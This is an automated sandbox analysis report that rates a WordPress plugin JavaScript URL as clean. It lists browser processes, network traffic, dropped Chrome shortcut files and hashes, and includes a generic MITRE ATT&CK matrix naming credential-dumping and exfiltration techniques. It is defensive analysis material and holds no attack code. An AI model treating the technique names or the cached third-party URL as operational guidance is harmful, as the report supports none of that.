Edit tour

Windows Analysis Report
https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0

Overview

General Information

Sample URL:https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0
Analysis ID:1626170
Infos:

Detection

Score:0
Range:0 - 100
Confidence:80%

Signatures

Stores files to the Windows start menu directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 4408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2020,i,6988893784052022274,9947833774328402582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0HTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0 HTTP/1.1Host: littlenation.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: littlenation.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: littlenation.com.au
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Feb 2025 00:33:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-Encoding
Source: chromecache_59.2.drString found in binary or memory: https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLly
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: classification engineClassification label: clean0.win@16/10@4/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2020,i,6988893784052022274,9947833774328402582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2020,i,6988893784052022274,9947833774328402582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1626170 URL: https://littlenation.com.au... Startdate: 28/02/2025 Architecture: WINDOWS Score: 0 5 chrome.exe 9 2->5         started        8 chrome.exe 2->8         started        dnsIp3 13 192.168.2.5, 443, 49703, 49712 unknown unknown 5->13 15 192.168.2.6 unknown unknown 5->15 17 239.255.255.250 unknown Reserved 5->17 10 chrome.exe 5->10         started        process4 dnsIp5 19 littlenation.com.au 45.65.61.130, 443, 49715, 49716 NETWORKDYNAMICS-PTY-LTD-AS-APNetworkDynamicsPtyLtdAU Australia 10->19 21 www.google.com 142.250.184.196, 443, 49712, 49990 GOOGLEUS United States 10->21

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.00%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://littlenation.com.au/favicon.ico0%Avira URL Cloudsafe
https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLly0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
littlenation.com.au
45.65.61.130
truefalse
    unknown
    www.google.com
    142.250.184.196
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://littlenation.com.au/favicon.icofalse
      • Avira URL Cloud: safe
      unknown
      https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0false
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLlychromecache_59.2.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        142.250.184.196
        www.google.comUnited States
        15169GOOGLEUSfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        45.65.61.130
        littlenation.com.auAustralia
        135543NETWORKDYNAMICS-PTY-LTD-AS-APNetworkDynamicsPtyLtdAUfalse
        IP
        192.168.2.6
        192.168.2.5
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1626170
        Start date and time:2025-02-28 01:32:44 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 2m 55s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:browseurl.jbs
        Sample URL:https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:CLEAN
        Classification:clean0.win@16/10@4/5
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 216.58.206.67, 142.250.186.110, 74.125.71.84, 172.217.23.110, 142.250.184.206, 142.250.185.238, 199.232.210.172, 2.23.77.188, 142.250.185.206, 142.250.185.142, 142.250.185.110, 172.217.18.14, 142.250.185.131, 142.250.184.238, 142.250.186.46, 216.58.206.46, 2.18.140.175, 52.149.20.212, 13.107.246.60
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 30 23:33:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2677
        Entropy (8bit):3.9660992873696457
        Encrypted:false
        SSDEEP:48:8EdLTTPfPHYidAKZdA19ehwiZUklqehNy+3:8In+Ky
        MD5:6BB73ECDA9A0461CC04AD13727DDE06D
        SHA1:FD07CB58738D7050522DD1373E191B8F16CF322D
        SHA-256:E4ADC512486EE143C2320E2D74418F1E46CA31770DC2BB714AAF2CB12D66EA7B
        SHA-512:112470F2CB2B0D6F12290085DA22E0BE99516954831A08B487256D5A14E8C4B22413EEFC49143ADECA561A4EE601D88B2B3E4408EA679EC1607DDAF1E6EE3EDB
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,.....Jgix...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\Z2.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Z2.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Z2.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Z2............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Z4............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 30 23:33:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2679
        Entropy (8bit):3.9815437272553384
        Encrypted:false
        SSDEEP:48:8V3dLTTPfPHYidAKZdA1weh/iZUkAQkqeh6y+2:8jnc9Q/y
        MD5:19F3F484E4F464DA5457EBE12997A213
        SHA1:A570FA09694577914BE7FA960D20786B5AACBCB6
        SHA-256:4D751BE0BE971C9195DC1A9F08BC1B8F0DF4FA05BD89D01EE5B4BD72DC612AB7
        SHA-512:AB0CAB56AD2C79C21D9124A1ECB807294C43B54EC647DC2FB2D62665EE6BF2D13C58356F74C6D948DD112899080295B45EFC1CA1657F244BF868AF27007A5A88
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,....4.]ix...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\Z2.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Z2.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Z2.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Z2............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Z4............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2693
        Entropy (8bit):3.9966522946471637
        Encrypted:false
        SSDEEP:48:8xYdLTTPfsHYidAKZdA14tseh7sFiZUkmgqeh7s8y+BX:8xMnhn2y
        MD5:71CE34163B92F8268818F04B613A366B
        SHA1:F7EDF2531B89F237370CB63860F76FE265C2199F
        SHA-256:CDCFC7F29E50774FB151E7E39B4AAC69748206F1A11C86D006A8C9560E708E3D
        SHA-512:A44190995227A9AB9C6D46EAA85EDE0C9E70D02C66DBAAD616E00968FE72780DFA10C7B0F7FFF978AC8C7FC6C7ED7D4328C249E6825E2EE9278335C38848C725
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\Z2.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Z2.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Z2.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Z2............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 30 23:33:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2681
        Entropy (8bit):3.9805587413609618
        Encrypted:false
        SSDEEP:48:8ddLTTPfPHYidAKZdA1vehDiZUkwqehOy+R:87nn0y
        MD5:F9EC094C5A7386B64D0357CA2C4975FA
        SHA1:666AD9ED56AA9366F9B87CA7B2136E852BF82323
        SHA-256:0DC236F0B1C7A7B681F3AD89226F96B797AAF834CC57045B75B0E7D12A04184D
        SHA-512:2824D9822C2066E2CEAF5F231A7E45EAE5276AF6FD6234168CC1B55F41C9A1F91EE20E8C83A9ECA9FE947ED79D513E8BABC45DC3B0D8174D20A7AC79638B5173
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,.....7Tix...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\Z2.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Z2.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Z2.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Z2............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Z4............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 30 23:33:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2681
        Entropy (8bit):3.9700558216291633
        Encrypted:false
        SSDEEP:48:8QdLTTPfPHYidAKZdA1hehBiZUk1W1qehYy+C:80nX94y
        MD5:011AE421C774515504D7061D0AED7B52
        SHA1:91B12EDCF1604F74D2954D8AB75A783F3D271485
        SHA-256:74DADE343735EC9D4E38F0C3F55D6B34EFE2205E4B94C9F809662E86A5FEAB2C
        SHA-512:F677CF05D37878811D3D92873DC22B9BC3EE56CBA5A6900B1F04D178D5512A595BC69AA97EEB6A9E2EE0D2D6CDAE93DC59D54D631061A99F2BA5FABDCF09E233
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,.....bix...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\Z2.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Z2.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Z2.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Z2............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Z4............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 30 23:33:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2683
        Entropy (8bit):3.9789145161764354
        Encrypted:false
        SSDEEP:48:8hdLTTPfPHYidAKZdA1duT+ehOuTbbiZUk5OjqehOuTb2y+yT+:8vnfT/TbxWOvTb2y7T
        MD5:DFC9A3B864FFC995B101CB76FAC51944
        SHA1:256347F24DAFD652025E517D041A492694541558
        SHA-256:D110073FB5606750D00BF10B50C9BCAB486926E1AD428147FD83D38CA50B7C4C
        SHA-512:BED9A801EC81A9C8ADA72B633B60C327ADB18D070CC05497524F47A4F2989D0D64D7F1A8AAA204A6C09D5230FE659D40F8EFB7D679A117BCF14ED0095CE63AD9
        Malicious:false
        Reputation:low
